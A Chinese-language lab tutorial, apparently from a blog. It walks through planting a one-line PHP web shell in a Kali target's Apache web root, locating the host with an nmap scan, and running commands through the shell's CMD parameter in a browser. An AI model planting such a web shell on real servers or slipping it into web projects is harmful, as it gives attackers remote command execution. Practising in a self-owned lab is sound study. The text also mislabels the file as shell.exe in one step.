目录
一、准备
1.kali主机
2.kali靶机
如未安装kali虚拟机可参考以下链接:
Kali Linux 安装过程 超详细(图文并茂,通用版)_好好学习-CSDN博客_kali linux安装教程
二、环境配置
1.root用户登录kali
推荐使用root身份登录kali靶机,以避免测试过程出现权限问题。
如果不知道如何登录,可参考以下链接:
??????2020最新kali设置root用户(直接设置root用户/单用户模式设置root用户)_陈健平的博客-CSDN博客_kali怎么进入root用户
2.创建shell.php
Apache默认的网站目录是在/var/www/html
在靶机/var/www/html文件目录下右键单击创建文件shell.exe
?创建成功后打开该文件,输入以下内容:
<?php system($_REQUEST['CMD']);?>保存并退出该文件
3.打开Apache
在靶机终端执行以下命令运行Apache
service apache2 start三、控制
在kali主机执行命令:
ifconfig以此查看主机ip:192.168.234.128
执行命令:
nmap 192.168.234.0/24?以此扫描该网段下所有主机ip
发现靶机ip:192.168.234.139
打开主机浏览器,在网址输入栏输入下列网址并进入:
http://192.168.234.139//shell.php?CMD=ls说明:“=”后面所接的是控制命令,执行“ls”命令可查看靶机目录文件
返回三个文件名,说明已经成功控制靶机?
现在我们看到的是该目录下的三个文件名,其中也包含了我们在靶机新建的shell.php